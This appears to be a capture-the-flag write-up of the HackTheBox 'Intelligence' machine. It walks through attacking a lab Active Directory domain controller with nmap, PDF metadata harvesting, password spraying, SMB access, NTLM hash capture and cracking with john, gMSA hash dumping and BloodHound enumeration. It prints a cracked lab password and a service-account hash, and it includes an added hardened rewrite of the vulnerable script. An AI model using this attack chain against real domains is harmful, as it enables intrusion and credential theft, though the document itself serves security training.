# Nmap 7.92 scan initiated Thu Sep 23 15:19:45 2021 as: nmap -sC -sV -oN nmap.out 10.10.10.248
Nmap scan report for 10.10.10.248
Host is up (0.35s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-09-23 16:05:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-09-23T16:06:48+00:00; +7h15m01s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-09-23T16:06:48+00:00; +7h15m01s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-09-23T16:06:48+00:00; +7h15m01s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-09-23T16:06:48+00:00; +7h15m01s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h15m00s, deviation: 0s, median: 7h15m00s
| smb2-time:
| date: 2021-09-23T16:06:11
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Sep 23 15:21:50 2021 -- 1 IP address (1 host up) scanned in 125.17 seconds
Nmap shows many services running on the machine: LDAP, Kerberos, HTTP, SMB and others. The output also gives us the hostname (dc.intelligence.htb) and the domain (intelligence.htb); add them to the /etc/hosts file.
Web Enumeration
There are two PDFs to download. Their contents are not interesting, but if we look at the metadata of the two files we can see the creator names.
Save them in a file and check whether these two users are valid.
Both accounts are valid. Now query the domain for users with "Do not require Kerberos pre-authentication" set and export their TGTs for cracking.
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup]
└──╼ [??]$ python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py intelligence.htb/ -usersfile users
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[-] User William.Lee doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jose.Williams doesn't have UF_DONT_REQUIRE_PREAUTH set
Neither account has "Do not require Kerberos pre-authentication" set. This means we cannot perform the AS-REP roasting attack, which requires a user with pre-authentication disabled.
Now look at the names of the PDF files; there is a pattern: 2020-01-01-upload.pdf
It is just a date, so we can generate a list of dates and brute-force the other PDF files.
Extracting the creator names from all the PDFs we find gives us a list of users, and all 30 accounts are valid. I checked which of them have "Do not require Kerberos pre-authentication" set, but unfortunately not a single one does.
Enumerating in PDF
When I grep the PDFs for "pass", I see this:
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup/pdf]
└──╼ [??]$ pdfgrep "pass" *.pdf
2020-06-04-upload.pdf:Please login using your username and the default password of:
2020-06-04-upload.pdf:After logging in please change your password as soon as possible.
In another PDF I also found this:
It tells us about a script placed by the user Ted, and that they are in the process of locking down service accounts.
Now we have a password and multiple users, so we should try a password spraying attack against all users with the password we found.
One user is valid with that password, and we can also access that user's shared folder.
smbclient \\\\intelligence.htb\\Users -U Tiffany.Molina
Enter WORKGROUP\Tiffany.Molina's password:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Mon Apr 19 07:50:26 2021
.. DR 0 Mon Apr 19 07:50:26 2021
Administrator D 0 Mon Apr 19 06:48:39 2021
All Users DHSrn 0 Sat Sep 15 13:51:46 2018
Default DHR 0 Mon Apr 19 08:47:40 2021
Default User DHSrn 0 Sat Sep 15 13:51:46 2018
desktop.ini AHS 174 Sat Sep 15 13:41:27 2018
Public DR 0 Mon Apr 19 06:48:39 2021
Ted.Graves D 0 Mon Apr 19 07:50:26 2021
Tiffany.Molina D 0 Mon Apr 19 07:21:46 2021
3770367 blocks of size 4096. 1390125 blocks available
smb: \>
In Tiffany’s directory we can find the user flag.
smb: \Tiffany.Molina\Desktop\> more user.txt
cc107e8830f*********f6f1e4795d69a6b
Privilege Escalation
In the IT share folder:
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup/pdf]
└──╼ [??]$ smbclient \\\\intelligence.htb\\IT -U Tiffany.Molina
Enter WORKGROUP\Tiffany.Molina's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Apr 19 07:20:55 2021
.. D 0 Mon Apr 19 07:20:55 2021
downdetector.ps1 A 1046 Mon Apr 19 07:20:55 2021
3770367 blocks of size 4096. 1390093 blocks available
smb: \> get downdetector.ps1
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \>
We get a PowerShell file:
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
# Enumerate the AD-integrated DNS records of the domain zone and keep those named web*
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
    try {
        # Probe the host with the credentials of the account running the task
        $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
        if($request.StatusCode -ne 200) {
            Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
        }
    } catch {}
}
It looks like a kind of cron job that runs every 5 minutes. It reads the DNS records stored in Active Directory and, for every record whose name starts with "web", requests that name over HTTP using the current user's credentials (probably Ted's). If the response code is not 200 (OK), it sends an email to Ted saying that the host is down.
If we map a DNS record to our own IP, the HTTP status check will reach our host, because our IP is mapped to that name, and we can then respond with an NTLM authentication request. So if we can add a DNS record, we can capture the Ted.Graves hash with Responder.
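A hardened rewrite of downdetector.ps1, added here as an example and not the script found on the box, that removes the two properties the attack relies on: the target list is no longer read from AD-integrated DNS, where authenticated domain users can create records by default, and the probe no longer hands the run-as user's credentials to whatever host answers for the name. The host names, the SMTP relay and the use of HTTPS are assumptions.

```powershell
# Hardened rewrite of downdetector.ps1 (added example, not the script from the box).
# Assumptions: the monitored hosts are listed here explicitly, the SMTP relay is
# mail.intelligence.htb, and the web servers are reachable over HTTPS.

$monitoredHosts = @('web01.intelligence.htb', 'web02.intelligence.htb')  # assumed names
$smtpServer     = 'mail.intelligence.htb'                                 # assumed relay
$notifyAddress  = 'Ted.Graves@intelligence.htb'

foreach ($hostName in $monitoredHosts) {
    # Accept only hosts in our own domain, so an edit to the list cannot
    # turn the task into a probe of an arbitrary address.
    if ($hostName -notmatch '^[a-z0-9-]+\.intelligence\.htb$') {
        Write-Warning "Skipping unexpected host name: $hostName"
        continue
    }

    try {
        # No -UseDefaultCredentials: an unauthenticated GET gives the responding
        # host nothing to challenge, so a spoofed name cannot harvest NTLM.
        # -MaximumRedirection 0 stops a redirect from sending the probe elsewhere.
        $response = Invoke-WebRequest -Uri "https://$hostName/" -UseBasicParsing `
                        -TimeoutSec 10 -MaximumRedirection 0 -ErrorAction Stop

        # 4xx/5xx replies already throw into the catch block; this covers any
        # other non-200 answer.
        if ($response.StatusCode -ne 200) {
            Send-MailMessage -SmtpServer $smtpServer -From $notifyAddress -To $notifyAddress `
                -Subject "Host: $hostName is down (HTTP $($response.StatusCode))"
        }
    } catch {
        # The original swallowed every error; a failed probe is itself worth an alert.
        Send-MailMessage -SmtpServer $smtpServer -From $notifyAddress -To $notifyAddress `
            -Subject "Host: $hostName is down" -Body $_.Exception.Message
    }
}
```

Even with these changes the scheduled task should run under a dedicated low-privilege account rather than a user's session, which is the "locking down service accounts" work the PDF mentioned.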
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup/krbrelayx]
└──╼ [??]$ john hash --wordlist=/opt/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Mr.Teddy (Ted.Graves)
1g 0:00:00:09 DONE (2021-11-27 18:29) 0.1075g/s 1162Kp/s 1162Kc/s 1162KC/s Mrz.deltasigma..Morgant1
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
We have Ted's password. Now we can try gMSADumper to read the password of the service account svc_int.
└──╼ [??]$ python3 gMSADumper.py -u 'Ted.Graves' -p 'Mr.Teddy' -d 'intelligence.htb' -l 'dc.intelligence.htb'
Users or groups who can read password for svc_int$:
> DC$
> itsupport
svc_int$:::b98d4cef68f72a98dfeed732d1b1abca
Now that we have the hash, I tried to crack it to get the password, but unfortunately got nothing.
Getting Silver Ticket
Let's use the pass-the-hash technique to impersonate the administrator and get a silver ticket. To generate a silver ticket we need one more thing: the SPN (Service Principal Name).
SPNs are used by Kerberos authentication to associate a service instance with a service logon account. This allows a client application to request that the service authenticate an account even if the client does not have the account name.
We will use the BloodHound tool to dump the AD environment and find the SPN.
┌─[sheinn101@parrot]─[/opt/BloodHound.py]
└──╼ [??]$ python3 bloodhound.py -u Ted.Graves -p 'Mr.Teddy' -ns 10.10.10.248 -d intelligence.htb -c All
INFO: Found AD domain: intelligence.htb
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 42 users
INFO: Found 54 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: svc_int.intelligence.htb
INFO: Querying computer: dc.intelligence.htb
WARNING: Could not resolve: svc_int.intelligence.htb: The DNS query name does not exist: svc_int.intelligence.htb.
INFO: Done in 01M 24S
It dumps all the information in JSON format. We are looking for the SPN; it should be in the computers.json file.